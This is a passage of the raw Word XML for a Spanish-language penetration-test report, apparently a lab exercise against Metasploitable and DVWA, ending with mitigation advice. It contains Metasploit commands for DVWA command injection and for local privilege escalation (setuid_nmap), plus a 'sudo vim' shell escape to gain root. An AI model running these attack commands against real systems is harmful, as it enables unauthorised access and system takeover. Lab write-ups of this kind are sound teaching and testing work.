        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="010157F5" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/webapp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa_command_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B97F3F3" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        set RHOST &lt;IP-Target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F766F9E" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        set RPORT 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4EA88" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        set TARGETURI /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/vulnerabilities/exec/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC65BD1" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BD36DE" w14:textId="15F8431E" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEC99B" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     2. La explotación fue exitosa, permitiendo la ejecución de comandos en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8E272" w14:textId="488473FC" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00DF40F5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Evidencia:</w:t>
      </w:r>
      <w:r w:rsidR="00DF40F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Captura de pantalla de la ejecución exitosa de comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D436E3" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728F3EF6" w14:textId="77777777" w:rsidR="00DF40F5" w:rsidRDefault="00DF40F5" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5928FFC0" w14:textId="77777777" w:rsidR="00DF40F5" w:rsidRDefault="00DF40F5" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654A6586" w14:textId="41F99406" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Escalación de Privilegios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225B552" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA9FD5B" w14:textId="46E371FB" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:ind w:left="150"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Descripción: Después de obtener acceso a la máquina, se utilizaron técnicas de escalación de privilegios para lograr acceso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33695B8F" w14:textId="55197337" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Proceso de Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA4C12" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     1. Se utilizó `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">` en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46AD30" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setuid_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E6ED06C" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        set SESSION &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36839698" w14:textId="43694780" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71352340" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>2. Alternativamente, se identificaron comandos con permisos `sudo`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07102CAF" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128ED9FE" w14:textId="77777777" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">        sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681FD0E" w14:textId="25ECBB25" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Evidencia: Captura de pantalla de la sesión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obtenida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5F818" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5D99CA" w14:textId="58118D87" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B22E5" w14:textId="301828F9" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Propuestas de Mitigación para las Vulnerabilidades Explotadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5671B4" w14:textId="67F1535E" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Servicio FTP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.3.4)</w:t>
      </w:r>
      <w:r w:rsidR="00DF40F5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554B6F1" w14:textId="6F1DF27B" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Acción: Actualizar a la última versión de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o reemplazar el servicio FTP con alternativas seguras como SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B4085" w14:textId="2CF50C02" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justificación: Evita la explotación de la puerta trasera incluida en versiones anteriores y permite mayor seguridad en la transferencia de archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66F4E6" w14:textId="538D19F3" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inyección de Comandos en DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDF970" w14:textId="27D99896" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Acción: Configurar DVWA en modo seguro y limitar su uso a entornos de pruebas con acceso restringido. Aplicar sanitización de entradas en la aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE0024" w14:textId="4EA0AD66" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justificación: Prevenir la ejecución de comandos arbitrarios, protegiendo el sistema de accesos no autorizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63884369" w14:textId="138ACB29" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Escalación de Privilegios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F0748" w14:textId="6D42FE1E" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Acción: Revisar y limitar los permisos de `sudo` para minimizar los posibles vectores de escalación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731743D3" w14:textId="42431D7F" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Justificación: Protege el sistema de accesos innecesarios a permisos elevados y reduce el riesgo de compromisos adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91DA6E" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65ADC0B6" w14:textId="122BA97B" w:rsidR="00010385" w:rsidRPr="00DF40F5" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF40F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6E08E" w14:textId="038DB6EB" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Impacto de las Vulnerabilidades y Reflexión sobre el Proceso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A18AA4" w14:textId="5E482E78" w:rsidR="00010385" w:rsidRDefault="00DF40F5" w:rsidP="00DF40F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00010385">
        <w:t>Las vulnerabilidades explotadas presentan un riesgo significativo para la integridad y confidencialidad del sistema. La explotación del servicio FTP y la inyección de comandos en DVWA permitieron acceso a la máquina, lo cual, en un entorno real, podría resultar en la filtración de datos o control no autorizado. Es esencial implementar las medidas de mitigación propuestas y fomentar una gestión continua de la seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550945D" w14:textId="77777777" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00010385"/>
    <w:p w14:paraId="43EE7FC9" w14:textId="51F373AB" w:rsidR="00010385" w:rsidRDefault="00010385" w:rsidP="00010385"/>
    <w:sectPr w:rsidR="000103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57E51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ACCD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7688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B6F"/>
    <w:rsid w:val="00010385"/>
    <w:rsid w:val="0046490E"/>
    <w:rsid w:val="006C7B6F"/>
    <w:rsid w:val="008619D8"/>
    <w:rsid w:val="008B4034"/>
    <w:rsid w:val="008E0175"/>
    <w:rsid w:val="00A51AA5"/>
    <w:rsid w:val="00D77446"/>
    <w:rsid w:val="00DF40F5"/>
    <w:rsid w:val="00EE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606DA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C77D9069-7B39-4084-8B71-4793FE01F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7B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7B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7B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B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7B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7B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7B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7B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7B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7B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C7B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C7B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B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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7B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13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0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1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3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8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724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Espindola Caballero</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mario Espindola Caballero</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-01T00:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-01T00:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>